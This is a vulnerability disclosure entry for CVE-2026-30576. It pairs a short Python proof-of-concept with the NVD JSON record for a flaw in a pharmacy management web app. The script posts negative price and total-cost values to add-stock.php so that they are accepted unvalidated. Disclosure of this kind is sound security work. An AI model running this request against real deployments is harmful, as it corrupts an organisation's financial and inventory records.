CVE-2026-30576

import requests def exploit_negative_price(target_url): """ PoC for CVE-2026-30576: Business Logic Vulnerability in Pharmacy Product Management System. Demonstrates submitting negative values for price and total cost. """ # The endpoint responsible for adding stock endpoint = "/add-stock.php" full_url = f"{target_url}{endpoint}" # Payload containing negative financial values data_payload = { "txtproduct": "1", # Valid Product ID "txtqty": "10", # Valid Quantity "txtprice": "-500.00", # Malicious: Negative Price "txttotalcost": "-5000.00" # Malicious: Negative Total Cost } try: # Sending the POST request to the vulnerable application response = requests.post(full_url, data=data_payload) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the database/financial records to verify if negative values were accepted.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://localhost/pharmacy" exploit_negative_price(target)

{"cve": {"id": "CVE-2026-30576", "sourceIdentifier": "[email protected]", "published": "2026-03-27T17:16:29.057", "lastModified": "2026-03-31T16:14:39.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Business Logic vulnerability exists in SourceCodester Pharmacy Product Management System 1.0 in the add-stock.php file. The application fails to validate the \"txtprice\" and \"txttotalcost\" parameters during stock entry, allowing negative financial values to be submitted. This leads to corruption of financial records, allowing attackers to manipulate inventory asset values and procurement costs."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:senior-walter:web-based_pharmacy_product_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "DB2DA030-DE10-4DA9-86D7-3E3E9A22DABC"}]}]}], "references": [{"url": "https://github.com/meifukun/Web-Security-PoCs/blob/main/Pharmacy-Product-Management-System/Logic-AddStock-NegativePrice.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}